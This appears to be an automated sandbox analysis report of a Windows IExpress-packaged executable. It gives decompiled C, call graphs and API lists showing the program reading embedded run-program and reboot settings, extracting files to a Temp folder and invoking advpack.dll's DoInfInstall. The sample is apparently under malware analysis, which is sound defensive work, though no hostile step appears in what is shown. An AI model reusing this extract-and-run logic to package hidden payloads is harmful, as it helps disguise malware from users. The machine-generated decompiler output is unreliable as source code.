SetFileAttributesA 3084->3086 3087 3e4e56 3085->3087 3086->3072 3087->3072 3088 3e4e64 3087->3088 3106 3e47e0 LocalAlloc 3088->3106 3091 3e4e6f 3091->3072 3093 3e4c4c DosDateTimeToFileTime 3092->3093 3094 3e4c88 3092->3094 3093->3094 3095 3e4c5e LocalFileTimeToFileTime 3093->3095 3094->3072 3094->3084 3095->3094 3096 3e4c70 SetFileTime 3095->3096 3096->3094 3115 3e66ae GetFileAttributesA 3097->3115 3099 3e477b 3099->3083 3100 3e47cc SetFileAttributesA 3102 3e47db 3100->3102 3102->3083 3103 3e6517 24 API calls 3104 3e47b1 3103->3104 3104->3100 3104->3102 3105 3e47c2 3104->3105 3105->3100 3107 3e480f LocalAlloc 3106->3107 3108 3e47f6 3106->3108 3111 3e4831 3107->3111 3114 3e480b 3107->3114 3109 3e44b9 20 API calls 3108->3109 3109->3114 3112 3e44b9 20 API calls 3111->3112 3113 3e4846 LocalFree 3112->3113 3113->3114 3114->3091 3116 3e4777 3115->3116 3116->3099 3116->3100 3116->3103 3174 3e3210 3175 3e3227 3174->3175 3198 3e328e EndDialog 3174->3198 3176 3e3235 3175->3176 3177 3e33e2 GetDesktopWindow 3175->3177 3181 3e324c 3176->3181 3182 3e32dd GetDlgItemTextA 3176->3182 3189 3e3239 3176->3189 3179 3e43d0 11 API calls 3177->3179 3180 3e33f1 SetWindowTextA SendDlgItemMessageA 3179->3180 3183 3e341f GetDlgItem EnableWindow 3180->3183 3180->3189 3184 3e32c5 EndDialog 3181->3184 3185 3e3251 3181->3185 3190 3e32fc 3182->3190 3206 3e3366 3182->3206 3183->3189 3184->3189 3186 3e325c LoadStringA 3185->3186 3185->3189 3188 3e3294 3186->3188 3199 3e327b 3186->3199 3187 3e44b9 20 API calls 3187->3189 3212 3e4224 LoadLibraryA 3188->3212 3193 3e3331 GetFileAttributesA 3190->3193 3190->3206 3196 3e333f 3193->3196 3197 3e337c 3193->3197 3194 3e44b9 20 API calls 3194->3198 3195 3e32a5 SetDlgItemTextA 3195->3189 3195->3199 3201 3e44b9 20 API calls 3196->3201 3200 3e658a CharPrevA 3197->3200 3198->3189 3199->3194 3202 3e338d 3200->3202 3203 3e3351 3201->3203 3204 3e58c8 27 API calls 3202->3204 3203->3189 3205 3e335a CreateDirectoryA 3203->3205 3207 3e3394 3204->3207 3205->3197 
3205->3206 3206->3187 3207->3206 3208 3e33a4 3207->3208 3209 3e33c7 EndDialog 3208->3209 3210 3e597d 34 API calls 3208->3210 3209->3189 3211 3e33c3 3210->3211 3211->3189 3211->3209 3213 3e4246 GetProcAddress 3212->3213 3214 3e43b2 3212->3214 3215 3e425d GetProcAddress 3213->3215 3216 3e43a4 FreeLibrary 3213->3216 3218 3e44b9 20 API calls 3214->3218 3215->3216 3217 3e4274 GetProcAddress 3215->3217 3216->3214 3217->3216 3219 3e428b 3217->3219 3220 3e329d 3218->3220 3221 3e4295 GetTempPathA 3219->3221 3225 3e42e1 3219->3225 3220->3189 3220->3195 3222 3e42ad 3221->3222 3222->3222 3223 3e42b4 CharPrevA 3222->3223 3224 3e42d0 CharPrevA 3223->3224 3223->3225 3224->3225 3226 3e4390 FreeLibrary 3225->3226 3226->3220 3227 3e4a50 3228 3e4a9f ReadFile 3227->3228 3229 3e4a66 3227->3229 3230 3e4abb 3228->3230 3229->3230 3231 3e4a82 memcpy 3229->3231 3231->3230 3232 3e3450 3233 3e345e 3232->3233 3234 3e34d3 EndDialog 3232->3234 3235 3e349a GetDesktopWindow 3233->3235 3238 3e3465 3233->3238 3237 3e346a 3234->3237 3236 3e43d0 11 API calls 3235->3236 3239 3e34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3236->3239 3238->3237 3240 3e348c EndDialog 3238->3240 3239->3237 3240->3237 3241 3e6c03 3242 3e6c1e 3241->3242 3243 3e6c17 _exit 3241->3243 3244 3e6c27 _cexit 3242->3244 3245 3e6c32 3242->3245 3243->3242 3244->3245 3117 3e6f40 SetUnhandledExceptionFilter 3118 3e4cc0 GlobalFree 3246 3e4200 3247 3e421e 3246->3247 3248 3e420b SendMessageA 3246->3248 3248->3247 3249 3e3100 3250 3e31b0 3249->3250 3251 3e3111 3249->3251 3253 3e31b9 SendDlgItemMessageA 3250->3253 3254 3e3141 3250->3254 3252 3e311d 3251->3252 3255 3e3149 GetDesktopWindow 3251->3255 3252->3254 3256 3e3138 EndDialog 3252->3256 3253->3254 3257 3e43d0 11 API calls 3255->3257 3256->3254 3258 3e315d 6 API calls 3257->3258 3258->3254 3259 3e4bc0 3260 3e4bd7 3259->3260 3262 3e4c05 3259->3262 3261 3e4c1b SetFilePointer 3261->3260 3262->3260 3262->3261 3263 3e30c0 3264 3e30de CallWindowProcA 3263->3264 3265 3e30ce 3263->3265 
3266 3e30da 3264->3266 3265->3264 3265->3266 3267 3e63c0 3268 3e6407 3267->3268 3269 3e658a CharPrevA 3268->3269 3270 3e6415 CreateFileA 3269->3270 3271 3e643a 3270->3271 3272 3e6448 WriteFile 3270->3272 3275 3e6ce0 4 API calls 3271->3275 3273 3e6465 CloseHandle 3272->3273 3273->3271 3276 3e648f 3275->3276

Callgraph

• Executed
• Not Executed
• Opacity -> Relevance
• Disassembly available

                                                                                                                                                                                                      Control-flow Graph

[Figure: control-flow graph of the function at 3E3BA2; legend: Executed / Not Executed]
                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E003E3BA2() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v280;
                                                                                                                                                                                                      				short _v300;
                                                                                                                                                                                                      				intOrPtr _v304;
                                                                                                                                                                                                      				void _v348;
                                                                                                                                                                                                      				char _v352;
                                                                                                                                                                                                      				intOrPtr _v356;
                                                                                                                                                                                                      				signed int _v360;
                                                                                                                                                                                                      				short _v364;
                                                                                                                                                                                                      				char* _v368;
                                                                                                                                                                                                      				intOrPtr _v372;
                                                                                                                                                                                                      				void* _v376;
                                                                                                                                                                                                      				intOrPtr _v380;
                                                                                                                                                                                                      				char _v384;
                                                                                                                                                                                                      				signed int _v388;
                                                                                                                                                                                                      				intOrPtr _v392;
                                                                                                                                                                                                      				signed int _v396;
                                                                                                                                                                                                      				signed int _v400;
                                                                                                                                                                                                      				signed int _v404;
                                                                                                                                                                                                      				void* _v408;
                                                                                                                                                                                                      				void* _v424;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      				signed int _t76;
                                                                                                                                                                                                      				void* _t77;
                                                                                                                                                                                                      				signed int _t79;
                                                                                                                                                                                                      				short _t96;
                                                                                                                                                                                                      				signed int _t97;
                                                                                                                                                                                                      				intOrPtr _t98;
                                                                                                                                                                                                      				signed int _t101;
                                                                                                                                                                                                      				signed int _t104;
                                                                                                                                                                                                      				signed int _t108;
                                                                                                                                                                                                      				int _t112;
                                                                                                                                                                                                      				void* _t115;
                                                                                                                                                                                                      				signed char _t118;
                                                                                                                                                                                                      				void* _t125;
                                                                                                                                                                                                      				signed int _t127;
                                                                                                                                                                                                      				void* _t128;
                                                                                                                                                                                                      				struct HINSTANCE__* _t129;
                                                                                                                                                                                                      				void* _t130;
                                                                                                                                                                                                      				short _t137;
                                                                                                                                                                                                      				char* _t140;
                                                                                                                                                                                                      				signed char _t144;
                                                                                                                                                                                                      				signed char _t145;
                                                                                                                                                                                                      				signed int _t149;
                                                                                                                                                                                                      				void* _t150;
                                                                                                                                                                                                      				void* _t151;
                                                                                                                                                                                                      				signed int _t153;
                                                                                                                                                                                                      				void* _t155;
                                                                                                                                                                                                      				void* _t156;
                                                                                                                                                                                                      				signed int _t157;
                                                                                                                                                                                                      				signed int _t162;
                                                                                                                                                                                                      				signed int _t164;
                                                                                                                                                                                                      				void* _t165;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                      				_t69 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                      				_t153 = 0;
                                                                                                                                                                                                      				 *0x3e9124 =  *0x3e9124 & 0;
                                                                                                                                                                                                      				_t149 = 0;
                                                                                                                                                                                                      				_v388 = 0;
                                                                                                                                                                                                      				_v384 = 0;
                                                                                                                                                                                                      				_t165 =  *0x3e8a28 - _t153; // 0x0
                                                                                                                                                                                                      				if(_t165 != 0) {
                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                      					_t127 = 0;
                                                                                                                                                                                                      					_v392 = 0;
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                      						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                      						_t164 = _t164 + 0xc;
                                                                                                                                                                                                      						_v348 = 0x44;
                                                                                                                                                                                                      						if( *0x3e8c42 != 0) {
                                                                                                                                                                                                      							goto L26;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t146 =  &_v396;
                                                                                                                                                                                                      						_t115 = E003E468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                      						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                      							L25:
                                                                                                                                                                                                      							_t146 = 0x4b1;
                                                                                                                                                                                                      							E003E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      							 *0x3e9124 = 0x80070714;
                                                                                                                                                                                                      							goto L62;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							if(_v396 != 1) {
                                                                                                                                                                                                      								__eflags = _v396 - 2;
                                                                                                                                                                                                      								if(_v396 != 2) {
                                                                                                                                                                                                      									_t137 = 3;
                                                                                                                                                                                                      									__eflags = _v396 - _t137;
                                                                                                                                                                                                      									if(_v396 == _t137) {
                                                                                                                                                                                                      										_v304 = 1;
                                                                                                                                                                                                      										_v300 = _t137;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L14;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_push(6);
                                                                                                                                                                                                      								_v304 = 1;
                                                                                                                                                                                                      								_pop(0);
                                                                                                                                                                                                      								goto L11;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_v304 = 1;
                                                                                                                                                                                                      								L11:
                                                                                                                                                                                                      								_v300 = 0;
                                                                                                                                                                                                      								L14:
                                                                                                                                                                                                      								if(_t127 != 0) {
                                                                                                                                                                                                      									L27:
                                                                                                                                                                                                      									_t155 = 1;
                                                                                                                                                                                                      									__eflags = _t127 - 1;
                                                                                                                                                                                                      									if(_t127 != 1) {
                                                                                                                                                                                                      										L31:
                                                                                                                                                                                                      										_t132 =  &_v280;
                                                                                                                                                                                                      										_t76 = E003E1AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                      										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E003E6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E003E3FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x3e8580;
													if( *0x3e8580 != 0) {
														E003E2267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x3e8180;
											if( *0x3e8180 == 0) {
												_t146 = 0x4c7;
												E003E44B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x3e9124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x3e9a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E003E6495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E003E44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x3e9124 = E003E6285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E003E44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x3e8a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x3e9a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x3e8a38 & 0x0000ffff;
											_v380 = 0x3e9154;
											_v376 = _t151;
											_v372 = 0x3e91e4;
											_v360 = _t97;
											if( *0x3e8a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x3e9a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x3e8d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x3e9a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x3ea288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x3e9124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x3e9a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x3e8a20;
										if( *0x3e8a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E003E202A(_t146); // executed
                                                                                                                                                                                                      										goto L37;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t146 =  &_v280;
                                                                                                                                                                                                      									_t108 = E003E468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                      									__eflags = _t108;
                                                                                                                                                                                                      									if(_t108 == 0) {
                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									__eflags =  *0x3e8c42;
                                                                                                                                                                                                      									if( *0x3e8c42 != 0) {
                                                                                                                                                                                                      										goto L69;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                      									__eflags = _t112 == 0;
                                                                                                                                                                                                      									if(_t112 == 0) {
                                                                                                                                                                                                      										goto L69;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L31;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t118 =  *0x3e8a38; // 0x0
                                                                                                                                                                                                      								if(_t118 == 0) {
                                                                                                                                                                                                      									L23:
                                                                                                                                                                                                      									if(_t153 != 0) {
                                                                                                                                                                                                      										goto L31;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t146 =  &_v276;
                                                                                                                                                                                                      									if(E003E468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                      										goto L27;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L25;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                      									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                      									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                      										goto L62;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t140 = "USRQCMD";
                                                                                                                                                                                                      									L20:
                                                                                                                                                                                                      									_t146 =  &_v276;
                                                                                                                                                                                                      									if(E003E468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                      										_t153 = 1;
                                                                                                                                                                                                      										_v388 = 1;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t140 = "ADMQCMD";
                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L26:
                                                                                                                                                                                                      						_push(_t130);
                                                                                                                                                                                                      						_t146 = 0x104;
                                                                                                                                                                                                      						E003E1781( &_v276, 0x104, _t130, 0x3e8c42);
                                                                                                                                                                                                      						goto L27;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t130 = "REBOOT";
                                                                                                                                                                                                      				_t125 = E003E468F(_t130, 0x3e9a2c, 4);
                                                                                                                                                                                                      				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                      					goto L25;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					goto L3;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}

                                                                                                                                                                                                      0x003e3f46
                                                                                                                                                                                                      0x003e3f47
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3f47
                                                                                                                                                                                                      0x003e3f1e
                                                                                                                                                                                                      0x003e3f1f
                                                                                                                                                                                                      0x003e3f25
                                                                                                                                                                                                      0x003e3f26
                                                                                                                                                                                                      0x003e3f2a
                                                                                                                                                                                                      0x003e3f2d
                                                                                                                                                                                                      0x003e3fd9
                                                                                                                                                                                                      0x003e3fd9
                                                                                                                                                                                                      0x003e3fda
                                                                                                                                                                                                      0x003e3fda
                                                                                                                                                                                                      0x003e3fe1
                                                                                                                                                                                                      0x003e3fe3
                                                                                                                                                                                                      0x003e3fe3
                                                                                                                                                                                                      0x003e3fe8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3fe8
                                                                                                                                                                                                      0x003e3f33
                                                                                                                                                                                                      0x003e3f37
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3f37
                                                                                                                                                                                                      0x003e3dee
                                                                                                                                                                                                      0x003e3dee
                                                                                                                                                                                                      0x003e3df5
                                                                                                                                                                                                      0x003e3fad
                                                                                                                                                                                                      0x003e3fb9
                                                                                                                                                                                                      0x003e3fc2
                                                                                                                                                                                                      0x003e3fc8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3fc8
                                                                                                                                                                                                      0x003e3dfb
                                                                                                                                                                                                      0x003e3dfd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3e03
                                                                                                                                                                                                      0x003e3e0a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3e15
                                                                                                                                                                                                      0x003e3e17
                                                                                                                                                                                                      0x003e3e19
                                                                                                                                                                                                      0x003e3f94
                                                                                                                                                                                                      0x003e3fa4
                                                                                                                                                                                                      0x003e3f7c
                                                                                                                                                                                                      0x003e3f80
                                                                                                                                                                                                      0x003e3f8b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3f8b
                                                                                                                                                                                                      0x003e3e2c
                                                                                                                                                                                                      0x003e3e30
                                                                                                                                                                                                      0x003e3e34
                                                                                                                                                                                                      0x003e3e36
                                                                                                                                                                                                      0x003e3f69
                                                                                                                                                                                                      0x003e3f6e
                                                                                                                                                                                                      0x003e3f70
                                                                                                                                                                                                      0x003e3f76
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3f76
                                                                                                                                                                                                      0x003e3e3c
                                                                                                                                                                                                      0x003e3e43
                                                                                                                                                                                                      0x003e3e47
                                                                                                                                                                                                      0x003e3e52
                                                                                                                                                                                                      0x003e3e56
                                                                                                                                                                                                      0x003e3e5c
                                                                                                                                                                                                      0x003e3e61
                                                                                                                                                                                                      0x003e3e68
                                                                                                                                                                                                      0x003e3e70
                                                                                                                                                                                                      0x003e3e74
                                                                                                                                                                                                      0x003e3e7c
                                                                                                                                                                                                      0x003e3e80
                                                                                                                                                                                                      0x003e3e82
                                                                                                                                                                                                      0x003e3e82
                                                                                                                                                                                                      0x003e3e87
                                                                                                                                                                                                      0x003e3e87
                                                                                                                                                                                                      0x003e3e8b
                                                                                                                                                                                                      0x003e3e91
                                                                                                                                                                                                      0x003e3e94
                                                                                                                                                                                                      0x003e3e96
                                                                                                                                                                                                      0x003e3e96
                                                                                                                                                                                                      0x003e3e9b
                                                                                                                                                                                                      0x003e3e9b
                                                                                                                                                                                                      0x003e3e9f
                                                                                                                                                                                                      0x003e3ea2
                                                                                                                                                                                                      0x003e3ea4
                                                                                                                                                                                                      0x003e3ea4
                                                                                                                                                                                                      0x003e3ea9
                                                                                                                                                                                                      0x003e3ea9
                                                                                                                                                                                                      0x003e3ead
                                                                                                                                                                                                      0x003e3eb3
                                                                                                                                                                                                      0x003e3eb6
                                                                                                                                                                                                      0x003e3eb8
                                                                                                                                                                                                      0x003e3eb8
                                                                                                                                                                                                      0x003e3ebd
                                                                                                                                                                                                      0x003e3ebd
                                                                                                                                                                                                      0x003e3ec1
                                                                                                                                                                                                      0x003e3ec3
                                                                                                                                                                                                      0x003e3ec5
                                                                                                                                                                                                      0x003e3ec5
                                                                                                                                                                                                      0x003e3eca
                                                                                                                                                                                                      0x003e3eca
                                                                                                                                                                                                      0x003e3ece
                                                                                                                                                                                                      0x003e3ed5
                                                                                                                                                                                                      0x003e3ed9
                                                                                                                                                                                                      0x003e3ee0
                                                                                                                                                                                                      0x003e3ee6
                                                                                                                                                                                                      0x003e3eea
                                                                                                                                                                                                      0x003e3eec
                                                                                                                                                                                                      0x003e3eee
                                                                                                                                                                                                      0x003e3ef3
                                                                                                                                                                                                      0x003e3ef3
                                                                                                                                                                                                      0x003e3ef5
                                                                                                                                                                                                      0x003e3efa
                                                                                                                                                                                                      0x003e3efb
                                                                                                                                                                                                      0x003e3efd
                                                                                                                                                                                                      0x003e3f40
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3eff
                                                                                                                                                                                                      0x003e3eff
                                                                                                                                                                                                      0x003e3f05
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3f05
                                                                                                                                                                                                      0x003e3efd
                                                                                                                                                                                                      0x003e3dc7
                                                                                                                                                                                                      0x003e3dce
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3dd0
                                                                                                                                                                                                      0x003e3dd7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3dd9

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 003E3C11
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 003E3CDC
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                        • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                        • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                        • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                        • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                        • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,003E8C42), ref: 003E3D8F
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 003E3E26
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,003E8C42), ref: 003E3EFF
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,003E8C42), ref: 003E3F1F
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,003E8C42), ref: 003E3F40
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,003E8C42), ref: 003E3F47
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,003E8C42), ref: 003E3F76
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,003E8C42), ref: 003E3F80
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,003E8C42), ref: 003E3FC2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                      • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
                                                                                                                                                                                                      • API String ID: 1032054927-908035787
                                                                                                                                                                                                      • Opcode ID: 02e8e74fbbbc9f12da16f5f2f282545751615c078dbbeb0cd100c57ec6939a3e
                                                                                                                                                                                                      • Instruction ID: 256e7ab98321d358e73c54b97e870c62efcd1b29e905cc0a19f9e66b525899e6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02e8e74fbbbc9f12da16f5f2f282545751615c078dbbeb0cd100c57ec6939a3e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52B192709083E19BD7339F26888976B76E8EB84750F110B29FA85DB2D0D770DD45CB52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph (function 003E1AE8; node legend: Executed / Not Executed)
                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E003E1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v527;
                                                                                                                                                                                                      				char _v528;
                                                                                                                                                                                                      				char _v1552;
                                                                                                                                                                                                      				CHAR* _v1556;
                                                                                                                                                                                                      				int* _v1560;
                                                                                                                                                                                                      				CHAR** _v1564;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t48;
                                                                                                                                                                                                      				CHAR* _t53;
                                                                                                                                                                                                      				CHAR* _t54;
                                                                                                                                                                                                      				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x3e8004; // 0x59d037e4
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
